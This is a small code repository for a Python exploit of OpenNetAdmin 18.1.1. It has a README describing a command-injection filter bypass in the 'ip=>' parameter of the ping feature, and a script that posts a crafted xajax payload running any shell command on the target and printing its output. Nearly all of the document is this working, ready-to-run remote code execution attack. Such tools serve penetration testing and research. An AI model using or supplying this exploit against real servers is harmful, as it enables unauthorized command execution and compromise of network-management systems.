├── requirements.txt
├── example
    └── example-run.gif
├── README.md
└── ona-exploit.py


/requirements.txt:
--------------------------------------------------------------------------------
1 | argparse
2 | termcolor
3 | urllib3
4 | requests
5 | bs4


--------------------------------------------------------------------------------
/example/example-run.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kr0ff/OpenNetAdmin-18.1.1-Remote-Code-Execution/main/example/example-run.gif


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # OpenNetAdmin 18.1.1 Remote Code Execution
 2 | 
 3 | OpenNetAdmin 18.1.1 is prone to remote code exectution via a filter bypass in the `ip=>` paramater.
 4 | The issue could be triggered in the ping section of the application where a user could attempt to ping a server.
 5 | 
 6 | ![Run of exploit](example/example-run.gif)
 7 | 
 8 | ## Requirements:
 9 | 
10 | - argparse
11 | - urllib3
12 | - requests
13 | - BeautifulSoup
14 | - termcolor
15 | 
16 | ```bash
17 | python3 -m pip install -r requirements.txt
18 | ```
19 | 


--------------------------------------------------------------------------------
/ona-exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | try:
 4 |     import requests
 5 |     import argparse
 6 |     import sys
 7 |     import time
 8 |     import urllib3
 9 |     from bs4 import BeautifulSoup as Soup
10 |     from termcolor import colored
11 | except ImportError as i:
12 |     print("[" + colored('0x0', 'red') + f"] {i}")
13 |     sys.exit(1)
14 | 
15 | urllib3.disable_warnings() # Disable SSL warning
16 | def ascii_art():
17 |     ascii = '''
18 | 8"""88                  8"""8            8""""8                       
19 | 8    8 eeeee eeee eeeee 8   8 eeee eeeee 8    8 eeeee eeeeeee e  eeeee
20 | 8    8 8   8 8    8   8 8e  8 8      8   8eeee8 8   8 8  8  8 8  8   8
21 | 8    8 8eee8 8eee 8e  8 88  8 8eee   8e  88   8 8e  8 8e 8  8 8e 8e  8
22 | 8    8 88    88   88  8 88  8 88     88  88   8 88  8 88 8  8 88 88  8
23 | 8eeee8 88    88ee 88  8 88  8 88ee   88  88   8 88ee8 88 8  8 88 88  8
24 | ver. 18.1.1                                                     @Kr0ff
25 |     '''
26 |     print(ascii)
27 | 
28 | def exploit(HOST, CMD):
29 | 
30 |     payload = f'xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;{CMD};echo&xajaxargs[]=ping'
31 | 
32 |     headers = {
33 |         "User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
34 |         "Accept": "*/*",
35 |         "Content-Length": str(len(payload)),
36 |         "Content-Type": "application/x-www-form-urlencoded"
37 |     }
38 |     print("[" + colored("+", "green") + "] Sending payload to target...")
39 |     
40 |     r = requests.post(f"{HOST}", data=payload, headers=headers, verify=False)
41 |     time.sleep(0.5)
42 |     if '<pre style="padding: 4px;font-family: monospace;">' in r.text:
43 |         print("[" + colored("+", "green") + "] Payload sent successfully")
44 |         time.sleep(0.5)
45 |     else:
46 |         print("[" + colored("!", "yellow") + "] Couldn't send payload. Something is wrong...")
47 |         sys.exit(0)
48 |     
49 |     soup = Soup(r.text , 'lxml') # Get in XML format
50 |     extract_pre = soup.find_all('pre')[0] # output only <pre> tag
51 |     
52 |     print("[" + colored("+", "green") + "] Printing output...")
53 |     time.sleep(0.1)
54 |     print("=" * 32)
55 |     print("\n"+extract_pre.text)
56 |     print("=" * 32)
57 | 
58 | #Initilize parser for arguments
59 | def parse_argz():   
60 |     parser = argparse.ArgumentParser(description='OpenNetAdmin 18.1.1 RCE')
61 |     parser.add_argument("-t", "--target", help="Target to send payload to. Example: http/s:[IP/HOSTNAME][:PORT]/ona/", type=str, required=True)
62 |     parser.add_argument("-c", "--cmd", help="Port to connect to", type=str, required=True)
63 |     #args = parser.parse_args(args=None if sys.argv[1:] else ['--help']) #Show help menu if no arguments provided
64 |     args = parser.parse_args(args=None)
65 | 
66 |     if not args.target or not args.cmd:
67 |         parser.error(colored("[WARNING]","yellow"), "Not all arguments provided")
68 |         sys.exit(1)
69 |     else:
70 |         TARGET = str(args.target)
71 |         CMD = str(args.cmd)
72 |         exploit(TARGET, CMD)
73 | 
74 | if __name__ == "__main__":
75 |     try:
76 |         ascii_art()
77 |         parse_argz()
78 |     except Exception as e:
79 |         print("[" + colored("0x1","red") + f"] {e}")
80 |         sys.exit(1)
81 |         


--------------------------------------------------------------------------------